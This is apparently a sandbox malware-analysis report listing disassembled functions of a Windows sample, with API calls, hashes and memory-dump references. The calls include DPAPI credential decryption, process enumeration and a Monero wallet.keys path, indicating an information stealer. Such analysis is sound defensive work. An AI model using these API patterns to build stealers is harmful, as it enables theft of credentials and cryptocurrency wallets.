                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: 4275bfd09db450f2bc2631d23e74827d11c0695724ff23d6c012d30f33e32166
                                        • Instruction ID: 28cc35f194b914790e153c6a9755199985428dd9ff2c557bc1f1375e2bd4380d
                                        • Opcode Fuzzy Hash: 4275bfd09db450f2bc2631d23e74827d11c0695724ff23d6c012d30f33e32166
                                        • Instruction Fuzzy Hash: 0412E072B101189ADB14FB60DE96EED7378BF64301F4046A9B90B96091EE346F4DCB92
                                        Function 00A4C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A4C871
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A4C87C
                                        • lstrcat.KERNEL32(?,00A60B46), ref: 00A4C943
                                        • lstrcat.KERNEL32(?,00A60B47), ref: 00A4C957
                                        • lstrcat.KERNEL32(?,00A60B4E), ref: 00A4C978
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 7643fec22a087c201ff18e6a61c50ce58c44e357b25287ec4c37932b50deddca
                                        • Instruction ID: 2720ff036cdbad98f69841c62871639a2290eba3789d4e8306b66a356baf688f
                                        • Opcode Fuzzy Hash: 7643fec22a087c201ff18e6a61c50ce58c44e357b25287ec4c37932b50deddca
                                        • Instruction Fuzzy Hash: 0B41607990421AEFDB10DF90DD89BFEB7B8BB48304F1045A9F509A62C0D7745A84CF95
                                        Function 00A47240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00A4724D
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A47254
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A47281
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00A472A4
                                        • LocalFree.KERNEL32(?), ref: 00A472AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: 15c48aabacaa3dc45209e803c7f363bb31b5b341fb9ea662b5568789dc51b06d
                                        • Instruction ID: 8025aa2242414fcefba0cf9ec2cb2785e2892a685f99b65662527eed27d90a99
                                        • Opcode Fuzzy Hash: 15c48aabacaa3dc45209e803c7f363bb31b5b341fb9ea662b5568789dc51b06d
                                        • Instruction Fuzzy Hash: 4D011EB5A40208BBEB10DFD4CD4AF9E77B8EB44B05F104555FB05AB2C0D7B0AA008B69
                                        Function 00A59600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A5961E
                                        • Process32First.KERNEL32(00A60ACA,00000128), ref: 00A59632
                                        • Process32Next.KERNEL32(00A60ACA,00000128), ref: 00A59647
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00A5965C
                                        • CloseHandle.KERNEL32(00A60ACA), ref: 00A5967A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 0cc381556755dcc37f18d63c88ac3346551478563c23cd0bd171476f4867aab8
                                        • Instruction ID: b7771cd8fd1c5f4d30f0612877261f5fa34b8e1a34adebfa09631816cc9ece5e
                                        • Opcode Fuzzy Hash: 0cc381556755dcc37f18d63c88ac3346551478563c23cd0bd171476f4867aab8
                                        • Instruction Fuzzy Hash: C7011E75A00208EBDB14DFA5DD58BEEB7F9FB48301F104199A90697280DB34AB48DF55
                                        Function 00DFF707 Relevance: 6.7, Strings: 4, Instructions: 1662COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $5'$<-zQ$CG^3$h"
                                        • API String ID: 0-2769956882
                                        • Opcode ID: 35eb1c64345b726d0840d4eb52e0d2d1ecce096fec5dc3d908cd41643bd45b25
                                        • Instruction ID: e1e453170bcefee239d1d6aca1c6d90d52e3970cfbba0359c4e912ba380e20e9
                                        • Opcode Fuzzy Hash: 35eb1c64345b726d0840d4eb52e0d2d1ecce096fec5dc3d908cd41643bd45b25
                                        • Instruction Fuzzy Hash: 85B238F3A0C2049FE304AE2DEC8567AB7E9EF94720F16853DEAC4C7744E63598058697
                                        Function 00E10254 Relevance: 6.6, Strings: 4, Instructions: 1613COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0o$CC|$G1>$M6re
                                        • API String ID: 0-1492517263
                                        • Opcode ID: 15da2aed524c8ec095c3876e2f2925b6f01f835fdf1876f9125aef9ff100a4c2
                                        • Instruction ID: 770e1e741a32d95ca3aa5342a3fc83df30d4123b6ce45553f667d7b53183104e
                                        • Opcode Fuzzy Hash: 15da2aed524c8ec095c3876e2f2925b6f01f835fdf1876f9125aef9ff100a4c2
                                        • Instruction Fuzzy Hash: 3AB215F360C2049FE304AE2DEC8567AFBE9EF94320F1A492DE6C4C7744E63598458697
                                        Function 00E07CED Relevance: 6.6, Strings: 4, Instructions: 1608COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: !Tn$!Tn$8x<$LJo;
                                        • API String ID: 0-2759588429
                                        • Opcode ID: 9ad378754366187f9d7698e944912a89e46451f1877d9a33fb669ab8641e67e4
                                        • Instruction ID: 6e683796c21377695f290ea78adb7fabe6105347831a7091c2d311530d03228b
                                        • Opcode Fuzzy Hash: 9ad378754366187f9d7698e944912a89e46451f1877d9a33fb669ab8641e67e4
                                        • Instruction Fuzzy Hash: 53B20AF3A082109FE3046E2DEC8567AF7E9EF94720F1A493DE6C5D3740E63598058697
                                        Function 00A58680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00A605B7), ref: 00A586CA
                                        • Process32First.KERNEL32(?,00000128), ref: 00A586DE
                                        • Process32Next.KERNEL32(?,00000128), ref: 00A586F3
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • CloseHandle.KERNEL32(?), ref: 00A58761
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: ebd0389d0bb9e33a18ea394bb48ccceb5d47c05b61db9c982dd1f423291d2d09
                                        • Instruction ID: 19b13cd3265e325236eec8054bf79c996f8c5788ca10c386afc63137facb82e5
                                        • Opcode Fuzzy Hash: ebd0389d0bb9e33a18ea394bb48ccceb5d47c05b61db9c982dd1f423291d2d09
                                        • Instruction Fuzzy Hash: AF316B71A01218ABDB24DF50CD41FEEB778FF58701F104699F90AA21A0EF346A49CFA1
                                        Function 00A58EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,00A45184,40000001,00000000,00000000,?,00A45184), ref: 00A58EC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 5600173ed615b7435306d827c1d44c200e9cce7cee2ed0975e1d82e89f7bad83
                                        • Instruction ID: e447db52ffbcfa07693980dac339e2b1796adc07973d94e04f4a2a62a48fa1a4
                                        • Opcode Fuzzy Hash: 5600173ed615b7435306d827c1d44c200e9cce7cee2ed0975e1d82e89f7bad83
                                        • Instruction Fuzzy Hash: 25110670200208BFDB00CF64DC85FAA33B9BF89306F109448FD1A9B250DB39E849DB64
                                        Function 00A49AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49AEF
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00A44EEE,00000000,?), ref: 00A49B01
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49B2A
                                        • LocalFree.KERNEL32(?,?,?,?,00A44EEE,00000000,?), ref: 00A49B3F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: 7c4f16737ab1640f84a2b3d72bc60edaa143bd34ef7cfdde91d2355ad2cb6375
                                        • Instruction ID: aca866fe31ef5e7b5902e49287f9abddae5cc586f1a620dbaf6394e65bceec01
                                        • Opcode Fuzzy Hash: 7c4f16737ab1640f84a2b3d72bc60edaa143bd34ef7cfdde91d2355ad2cb6375
                                        • Instruction Fuzzy Hash: 8711A2B4240208AFEB10CF64DC95FAA77B5FB89700F208059FA159B3D0C7B6A901CBA4
                                        Function 00A57980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A60E00,00000000,?), ref: 00A579B0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A579B7
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00A60E00,00000000,?), ref: 00A579C4
                                        • wsprintfA.USER32 ref: 00A579F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
